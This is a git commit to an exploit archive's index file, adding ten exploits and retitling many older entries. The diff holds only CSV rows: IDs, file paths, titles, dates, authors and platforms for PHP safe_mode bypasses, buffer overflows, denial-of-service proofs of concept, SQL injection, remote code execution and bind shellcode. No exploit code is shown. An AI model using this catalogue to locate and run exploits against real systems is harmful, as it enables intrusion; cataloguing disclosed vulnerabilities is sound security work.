DB: 2017-06-27

10 new exploits PHP Exif Extension - 'exif_read_data()' Function Remote Denial of Service PHP 'Exif' Extension - 'exif_read_data()' Function Remote Denial of Service PHP phar extension 1.1.1 - Heap Overflow PHP 'phar' Extension 1.1.1 - Heap Overflow PHP 5.2.1 GD Extension - '.WBMP' File Integer Overflow Vulnerabilities PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow Vulnerabilities PHP 5.3.1 - 'session_save_path()' 'Safe_mode' Restriction-Bypass PHP 5.3.1 - 'session_save_path()' 'Safe_mode()' Restriction Bypass Exploiot PHP 5.3.2 xmlrpc Extension - Multiple Remote Denial of Service Vulnerabilities PHP 5.3.2 'xmlrpc' Extension - Multiple Remote Denial of Service Vulnerabilities PHP 5.3.x - 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service PHP 5.3.x - 'Zip' Extension 'stream_get_contents()' Function Denial of Service PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Function Denial of Service PHP 5.3.x 'Zip' Extension - 'stream_get_contents()' Function Denial of Service PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak Denial of Service PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak Denial of Service PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Function Plaintext Data Memory Leak Denial of Service PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Function Ciphertext Data Memory Leak Denial of Service unrar 5.40 - VMSF_DELTA Filter Arbitrary Memory Write unrar 5.40 - 'VMSF_DELTA' Filter Arbitrary Memory Write NTFS 3.1 - Master File Table Denial of Service LAME 3.99.5 - 'II_step_one' Buffer Overflow LAME 3.99.5 - 'III_dequantize_sample' Stack-Based Buffer Overflow IBM DB2 9.7 / 10.1 / 10.5 / 11.1 - Command Line Processor Buffer Overflow PHP COM extensions - (inconsistent Win32) Safe_mode Bypass Exploit PHP 'COM' Extensions - (inconsistent Win32) 'safe_mode' Bypass Exploit PHP 5.2.3 Tidy extension - Local Buffer Overflow PHP 5.2.3 'Tidy' Extension - Local Buffer Overflow PHP 5.2.3 - Win32std ext. Safe_mode/disable_functions Protections Bypass PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit PHP 5.x - (Win32service) Local 'Safe_Mode()' Bypass Exploit PHP FFI Extension 5.0.5 - Local Safe_mode Bypass PHP Perl Extension - Safe_mode BypassExploit PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass Exploit PHP 'Perl' Extension - 'Safe_mode' Bypass Exploit PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass PHP 4.4.7 / 5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass Exploit PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass PHP 5.x - COM functions Safe_mode and disable_function Bypass PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass PHP 5.2.6 - (error_log) Safe_mode Bypass PHP 5.2.6 - 'error_log' Safe_mode Bypass Exploit PHP - Safe_mode Bypass via proc_open() and custom Environment PHP - 'Safe_mode' Bypass via 'proc_open()' and custom Environment PHP python extension safe_mode - Bypass Local PHP 'python' Extension - 'safe_mode' Local Bypass Exploit PHP 3 < 5 - Ini_Restore() Safe_mode and open_basedir Restriction Bypass PHP 3 < 5 - Ini_Restore() 'Safe_mode' / 'open_basedir' Restriction Bypass PHP 5.2 - Session.Save_Path() Safe_mode and open_basedir Restriction Bypass PHP 5.2 - Session.Save_Path() 'Safe_mode' / 'open_basedir' Restriction Bypass PHP 5.2 - FOpen Safe_mode Restriction-Bypass PHP 5.2 - FOpen 'Safe_mode' Restriction Bypass Exploit PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' and 'open_basedir' Restriction Bypass Vulnerabilities PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' / 'open_basedir' Restriction Bypass Vulnerabilities suPHP 0.7 - 'suPHP_ConfigPath' Safe Mode Restriction-Bypass suPHP 0.7 - 'suPHP_ConfigPath' Safe_Mode() Restriction Bypass Exploit PHP 5.2.9 cURL - 'Safe_mode' and 'open_basedir' Restriction-Bypass PHP 5.2.9 cURL - 'Safe_mode' / 'open_basedir' Restriction Bypass Exploit JAD Java Decompiler 1.5.8e - Buffer Overflow Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass/RCI Exploit Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass / Remote Code Injection Exploit Network Tool 0.2 PHP-Nuke Addon - MetaCharacter Filtering Command Execution PHP-Nuke Network Tool 0.2 Addon - MetaCharacter Filtering Command Execution PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure PHP 4.x/5.x - 'Html_Entity_Decode()' Information Disclosure PHP 4.x - copy() Function Safe Mode Bypass PHP 4.x - 'copy()' Function 'Safe_Mode' Bypass Exploit PHP 5.2.5 - cURL 'safe mode' Security Bypass PHP 5.2.5 - cURL 'safe_mode' Security Bypass Exploit PHP 5.x (5.3.x 5.3.2) - 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities PHP 5.3.x < 5.3.2 - 'ext/phar/stream.c' / 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities Apache 2.4.7 + PHP 7.0.2 - openssl_seal() Uninitialized Memory Code Execution Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit) Crypttech CryptoLog - Remote Code Execution (Metasploit) Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit) Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit) Linux/x86 - Bind Shell Shellcode (75 bytes) JiRos Banner Experience 1.0 - (Create Authentication Bypass) Remote Exploit JiRos Banner Experience 1.0 - Create Authentication Bypass Remote Exploit XOOPS myAds Module - (lid) SQL Injection XOOPS myAds Module - 'lid' SQL Injection PHP-Update 2.7 - extract() Authentication Bypass / Shell Inject Exploit PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Inject Exploit Kolang - proc_open PHP safe mode Bypass 4.3.10 - 5.3.0 Exploit Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass Exploit SmarterMail 7.x (7.2.3925) - Persistent Cross-Site Scripting SmarterMail 7.x (7.2.3925) - LDAP Injection SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting SmarterMail < 7.2.3925 - LDAP Injection MaticMarket 2.02 for PHP-Nuke - Local File Inclusion PHP-Nuke MaticMarket 2.02 - Local File Inclusion WordPress Plugin BuddyPress plugin 1.5.x < 1.5.5 - SQL Injection WordPress Plugin BuddyPress Plugin 1.5.x < 1.5.5 - SQL Injection Search Enhanced Module 1.1/2.0 for PHP-Nuke - HTML Injection PHP-Nuke Search Enhanced Module 1.1/2.0 - HTML Injection SonicWALL Gms 7.x - Filter Bypass & Persistent Exploit SonicWALL Gms 7.x - Filter Bypass / Persistent Exploit Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Exploit Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass / Persistent Exploit PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock) PHP < 5.6.2 - 'disable_functions()' Bypass Exploit (Shellshock) phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection phpSFP Schedule Facebook Posts 1.5.6 - SQL Injection pragmaMx 1.12.1 - modules.php URI Cross-Site Scripting pragmaMx 1.12.1 - 'modules.php' URI Cross-Site Scripting Glossaire Module for XOOPS - '/modules/glossaire/glossaire-aff.php' SQL Injection XOOPS Glossaire Module- '/modules/glossaire/glossaire-aff.php' SQL Injection ATutor LMS - install_modules.php Cross-Site Request Forgery / Remote Code Execution ATutor LMS - 'install_modules.php' Cross-Site Request Forgery / Remote Code Execution vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API vBulletin 4.x/5.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API Eltek SmartPack - Backdoor Account
2017-06-27 05:01:26 +00:00 · 2017-06-27 05:01:26 +00:00 · 6ab9a26ee4
commit 6ab9a26ee4
parent 01582b0e2c
11 changed files with 1122 additions and 53 deletions
--- a/files.csv
+++ b/files.csv
@ -1904,7 +1904,7 @@ id,file,description,date,author,platform,type,port
 16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 - Null Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0
 16255,platforms/windows/dos/16255.pl,"Magic Music Editor - '.cda' Denial of Service",2011-02-28,AtT4CKxT3rR0r1ST,windows,dos,0
 16260,platforms/windows/dos/16260.py,"Quick 'n Easy FTP Server 3.2 - Denial of Service",2011-02-28,clshack,windows,dos,0
-16261,platforms/multiple/dos/16261.txt,"PHP Exif Extension - 'exif_read_data()' Function Remote Denial of Service",2011-02-28,"_ikki and paradoxengine",multiple,dos,0
+16261,platforms/multiple/dos/16261.txt,"PHP 'Exif' Extension - 'exif_read_data()' Function Remote Denial of Service",2011-02-28,"_ikki and paradoxengine",multiple,dos,0
 16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation (PoC) (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0
 16263,platforms/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos,0
 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
@ -1956,7 +1956,7 @@ id,file,description,date,author,platform,type,port
 17163,platforms/windows/dos/17163.txt,"Microsoft Reader 2.1.1.3143 - Array Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0
 17164,platforms/windows/dos/17164.txt,"Microsoft Reader 2.1.1.3143 - Null Byte Write",2011-04-12,"Luigi Auriemma",windows,dos,0
 17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL - Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0
-17201,platforms/multiple/dos/17201.php,"PHP phar extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0
+17201,platforms/multiple/dos/17201.php,"PHP 'phar' Extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0
 17222,platforms/linux/dos/17222.c,"Libmodplug 0.8.8.2 - '.abc' Stack Based Buffer Overflow (PoC)",2011-04-28,epiphant,linux,dos,0
 17227,platforms/windows/dos/17227.py,"Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC) (MS11-02)",2011-04-29,webDEViL,windows,dos,0
 17266,platforms/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0
@ -3781,7 +3781,7 @@ id,file,description,date,author,platform,type,port
 29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - '.bmp' Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0
 29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple '.BMP' Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0
 29819,platforms/windows/dos/29819.c,"IrfanView 3.99 - Multiple .BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0
-29823,platforms/php/dos/29823.c,"PHP 5.2.1 GD Extension - '.WBMP' File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0
+29823,platforms/php/dos/29823.c,"PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0
 29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service",2007-04-09,"Jean Delvare",linux,dos,0
 29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 - Hostname Remote Buffer Overflow",2007-04-30,"Thomas Pollet",windows,dos,0
 29850,platforms/windows/dos/29850.txt,"eIQnetworks Enterprise Security Analyzer 2.5 - Multiple Buffer Overflow Vulnerabilities",2007-04-12,"Leon Juranic",windows,dos,0
@ -4253,7 +4253,7 @@ id,file,description,date,author,platform,type,port
 33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0
 33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",multiple,dos,0
 33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0
-33625,platforms/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path()' 'Safe_mode' Restriction-Bypass",2010-02-11,"Grzegorz Stachowiak",php,dos,0
+33625,platforms/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path()' 'Safe_mode()' Restriction Bypass Exploiot",2010-02-11,"Grzegorz Stachowiak",php,dos,0
 33713,platforms/windows/dos/33713.py,"Core FTP LE 2.2 - Heap Overflow (PoC)",2014-06-11,"Gabor Seljan",windows,dos,0
 33677,platforms/php/dos/33677.txt,"PHP 5.3.1 - LCG Entropy Security",2010-02-26,Rasmus,php,dos,0
 33672,platforms/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service",2010-02-24,Nicob,linux,dos,0
@ -4266,7 +4266,7 @@ id,file,description,date,author,platform,type,port
 33733,platforms/windows/dos/33733.pl,"httpdx 1.5.3 - '.png' File Handling Remote Denial of Service",2010-03-10,"Jonathan Salwan",windows,dos,0
 33735,platforms/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",multiple,dos,0
 33737,platforms/hardware/dos/33737.py,"ZTE / TP-Link RomPager - Denial of Service",2014-06-13,"Osanda Malith",hardware,dos,0
-33755,platforms/php/dos/33755.php,"PHP 5.3.2 xmlrpc Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0
+33755,platforms/php/dos/33755.php,"PHP 5.3.2 'xmlrpc' Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0
 33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - .AVI File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,windows,dos,0
 33775,platforms/windows/dos/33775.py,"Xilisoft Video Converter Wizard - '.yuv' Stack Buffer Overflow",2010-03-19,ITSecTeam,windows,dos,0
 33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 - GET Request Format String Denial of Service",2010-03-20,Rick2600,windows,dos,0
@ -4423,11 +4423,11 @@ id,file,description,date,author,platform,type,port
 35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service",2011-01-03,"Serge Dubrouski",linux,dos,0
 35465,platforms/multiple/dos/35465.pl,"VideoLAN VLC Media Player 1.0.5 - '.ape' Denial of Service",2011-03-15,KedAns-Dz,multiple,dos,0
 35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 - Tag Nesting Remote Denial of Service",2010-12-21,anonymous,linux,dos,0
-35483,platforms/php/dos/35483.txt,"PHP 5.3.x - 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service",2011-03-10,thoger,php,dos,0
+35483,platforms/php/dos/35483.txt,"PHP 5.3.x  'Intl' Extension - 'NumberFormatter::setSymbol()' Function Denial of Service",2011-03-10,thoger,php,dos,0
-35484,platforms/php/dos/35484.php,"PHP 5.3.x - 'Zip' Extension 'stream_get_contents()' Function Denial of Service",2011-03-10,paulgao,php,dos,0
+35484,platforms/php/dos/35484.php,"PHP 5.3.x 'Zip' Extension - 'stream_get_contents()' Function Denial of Service",2011-03-10,paulgao,php,dos,0
 35485,platforms/php/dos/35485.php,"PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service",2011-03-10,TorokAlpar,php,dos,0
-35486,platforms/php/dos/35486.php,"PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0
+35486,platforms/php/dos/35486.php,"PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Function Plaintext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0
-35487,platforms/php/dos/35487.php,"PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0
+35487,platforms/php/dos/35487.php,"PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Function Ciphertext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0
 35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0
 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,windows,dos,0
 35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
@ -5589,11 +5589,15 @@ id,file,description,date,author,platform,type,port
 42242,platforms/windows/dos/42242.cpp,"Microsoft Windows - 'nt!NtQueryInformationResourceManager (information class 0)' Kernel Stack Memory Disclosure",2017-06-23,"Google Security Research",windows,dos,0
 42243,platforms/windows/dos/42243.txt,"Microsoft Windows - Kernel ATMFD.DLL Out-of-Bounds Read due to Malformed Name INDEX in the CFF Table",2017-06-23,"Google Security Research",windows,dos,0
 42244,platforms/windows/dos/42244.cpp,"Microsoft Windows - 'nt!NtQueryInformationWorkerFactory (WorkerFactoryBasicInformation)' Kernel Stack Memory Disclosure",2017-06-23,"Google Security Research",windows,dos,0
-42245,platforms/multiple/dos/42245.txt,"unrar 5.40 - VMSF_DELTA Filter Arbitrary Memory Write",2017-06-23,"Google Security Research",multiple,dos,0
+42245,platforms/multiple/dos/42245.txt,"unrar 5.40 - 'VMSF_DELTA' Filter Arbitrary Memory Write",2017-06-23,"Google Security Research",multiple,dos,0
 42246,platforms/windows/dos/42246.html,"Microsoft Edge - 'CssParser::RecordProperty' Type Confusion",2017-06-23,"Google Security Research",windows,dos,0
 42247,platforms/multiple/dos/42247.txt,"Adobe Flash - AVC Edge Processing Out-of-Bounds Read",2017-06-23,"Google Security Research",multiple,dos,0
 42248,platforms/multiple/dos/42248.txt,"Adobe Flash - Image Decoding Out-of-Bounds Read",2017-06-23,"Google Security Research",multiple,dos,0
 42249,platforms/multiple/dos/42249.txt,"Adobe Flash - ATF Parser Heap Corruption",2017-06-23,"Google Security Research",multiple,dos,0
 42253,platforms/windows/dos/42253.html,"NTFS 3.1 - Master File Table Denial of Service",2017-06-26,EagleWire,windows,dos,0
 42258,platforms/linux/dos/42258.txt,"LAME 3.99.5 - 'II_step_one' Buffer Overflow",2017-06-26,"Agostino Sarubbo",linux,dos,0
 42259,platforms/linux/dos/42259.txt,"LAME 3.99.5 - 'III_dequantize_sample' Stack-Based Buffer Overflow",2017-06-26,"Agostino Sarubbo",linux,dos,0
 42260,platforms/multiple/dos/42260.py,"IBM DB2 9.7 / 10.1 / 10.5 / 11.1 - Command Line Processor Buffer Overflow",2017-06-26,defensecode,multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -6011,7 +6015,7 @@ id,file,description,date,author,platform,type,port
 3424,platforms/multiple/local/3424.php,"PHP 5.2.1 - substr_compare() Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0
 3426,platforms/linux/local/3426.php,"PHP < 4.4.5 / 5.2.1 - (shmop functions) Local Code Execution",2007-03-07,"Stefan Esser",linux,local,0
 3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure",2007-03-07,"Stefan Esser",linux,local,0
-3429,platforms/windows/local/3429.php,"PHP COM extensions - (inconsistent Win32) Safe_mode Bypass Exploit",2007-03-07,anonymous,windows,local,0
+3429,platforms/windows/local/3429.php,"PHP 'COM' Extensions - (inconsistent Win32) 'safe_mode' Bypass Exploit",2007-03-07,anonymous,windows,local,0
 3431,platforms/windows/local/3431.php,"PHP 4.4.6 - crack_opendict() Local Buffer Overflow (PoC)",2007-03-08,rgod,windows,local,0
 3439,platforms/windows/local/3439.php,"PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC)",2007-03-09,rgod,windows,local,0
 3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - 'zip://' URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local,0
@ -6069,19 +6073,19 @@ id,file,description,date,author,platform,type,port
 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow",2007-06-02,n00b,windows,local,0
 4028,platforms/linux/local/4028.txt,"Screen 4.0.3 (OpenBSD) - Local Authentication Bypass",2008-06-18,Rembrandt,linux,local,0
 4051,platforms/windows/local/4051.rb,"MoviePlay 4.76 - '.lst' Local Buffer Overflow",2007-06-08,n00b,windows,local,0
-4080,platforms/windows/local/4080.php,"PHP 5.2.3 Tidy extension - Local Buffer Overflow",2007-06-19,rgod,windows,local,0
+4080,platforms/windows/local/4080.php,"PHP 5.2.3 'Tidy' Extension - Local Buffer Overflow",2007-06-19,rgod,windows,local,0
 40465,platforms/linux/local/40465.txt,"Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials",2016-10-05,KoreLogic,linux,local,0
 4165,platforms/windows/local/4165.c,"WinPcap 4.0 - 'NPF.SYS' Privilege Escalation (PoC)",2007-07-10,"Mario Ballano BÃ¡rcena",windows,local,0
 4172,platforms/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak (PoC)",2007-07-10,dreyer,linux,local,0
 4178,platforms/windows/local/4178.txt,"Symantec AntiVirus - 'symtdi.sys' Privilege Escalation",2007-07-12,"Zohiartze Herce",windows,local,0
 4203,platforms/multiple/local/4203.sql,"Oracle 9i/10g - Evil Views Change Passwords Exploit",2007-07-19,bunker,multiple,local,0
 4204,platforms/windows/local/4204.php,"PHP 5.2.3 - snmpget() object id Local Buffer Overflow",2007-07-20,shinnai,windows,local,0
-4218,platforms/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. Safe_mode/disable_functions Protections Bypass",2007-07-24,shinnai,windows,local,0
+4218,platforms/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass",2007-07-24,shinnai,windows,local,0
 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0
 4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0
 4232,platforms/aix/local/4232.sh,"IBM AIX 5.3 sp6 - pioout Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,aix,local,0
 4233,platforms/aix/local/4233.c,"IBM AIX 5.3 SP6 - FTP gets() Privilege Escalation",2007-07-27,qaaz,aix,local,0
-4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0
+4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local 'Safe_Mode()' Bypass Exploit",2007-07-27,NetJackal,windows,local,0
 4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - '.mpr replay' Buffer Overflow",2007-08-01,n00b,windows,local,0
 4257,platforms/windows/local/4257.c,"Panda AntiVirus 2008 - Privilege Escalation",2007-08-05,tarkus,windows,local,0
 4262,platforms/windows/local/4262.cpp,"Live for Speed S1/S2/Demo - '.ply' Buffer Overflow",2007-08-06,n00b,windows,local,0
@ -6090,22 +6094,22 @@ id,file,description,date,author,platform,type,port
 4274,platforms/windows/local/4274.php,"PHP 5.2.3 - snmpget() object id Local Buffer Overflow (EDI)",2007-08-09,Inphex,windows,local,0
 4302,platforms/windows/local/4302.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (1)",2007-08-22,Inphex,windows,local,0
 4303,platforms/windows/local/4303.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (2)",2007-08-22,NetJackal,windows,local,0
-4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass",2007-08-23,NetJackal,windows,local,0
+4311,platforms/windows/local/4311.php,"PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local  Bypass Exploit",2007-08-23,NetJackal,windows,local,0
-4314,platforms/windows/local/4314.php,"PHP Perl Extension - Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0
+4314,platforms/windows/local/4314.php,"PHP 'Perl' Extension - 'Safe_mode' Bypass Exploit",2007-08-25,NetJackal,windows,local,0
 4325,platforms/windows/local/4325.php,"XAMPP for Windows 1.6.3a - Privilege Escalation",2007-08-27,Inphex,windows,local,0
 4345,platforms/windows/local/4345.c,"Norman Virus Control - 'nvcoaft51.sys' ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0
 4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,windows,local,0
 4355,platforms/windows/local/4355.php,"OtsTurntables 1.00 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,windows,local,0
 4361,platforms/windows/local/4361.pl,"Microsoft Visual Basic 6.0 - VBP_Open OLE Local CodeExec Exploit",2007-09-04,Koshi,windows,local,0
 4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,windows,local,0
-4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0
+4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass Exploit",2007-09-10,"Mattias Bengtsson",multiple,local,0
 4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0
 4460,platforms/lin_x86-64/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",lin_x86-64,local,0
 4515,platforms/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,solaris,local,0
 4516,platforms/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,solaris,local,0
-4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0
+4517,platforms/windows/local/4517.php,"PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass",2007-10-11,shinnai,windows,local,0
 4531,platforms/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local Overwrite (SEH)",2007-10-14,h07,windows,local,0
-4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions Safe_mode and disable_function Bypass",2007-10-22,shinnai,windows,local,0
+4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass",2007-10-22,shinnai,windows,local,0
 4564,platforms/multiple/local/4564.txt,"Oracle 10g - CTX_DOC.MARKUP SQL Injection",2007-10-23,sh2kerr,multiple,local,0
 4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (1)",2007-10-27,bunker,multiple,local,0
 4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (2)",2007-10-27,bunker,multiple,local,0
@ -6185,7 +6189,7 @@ id,file,description,date,author,platform,type,port
 7054,platforms/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 - 'AKEProtect.sys' Privilege Escalation",2008-11-07,"NT Internals",windows,local,0
 7129,platforms/multiple/local/7129.sh,"Sudo 1.6.9p18 - (Defaults setenv) Privilege Escalation",2008-11-15,kingcope,multiple,local,0
 7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0
-7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0
+7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - 'error_log' Safe_mode Bypass Exploit",2008-11-20,SecurityReason,multiple,local,0
 7177,platforms/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
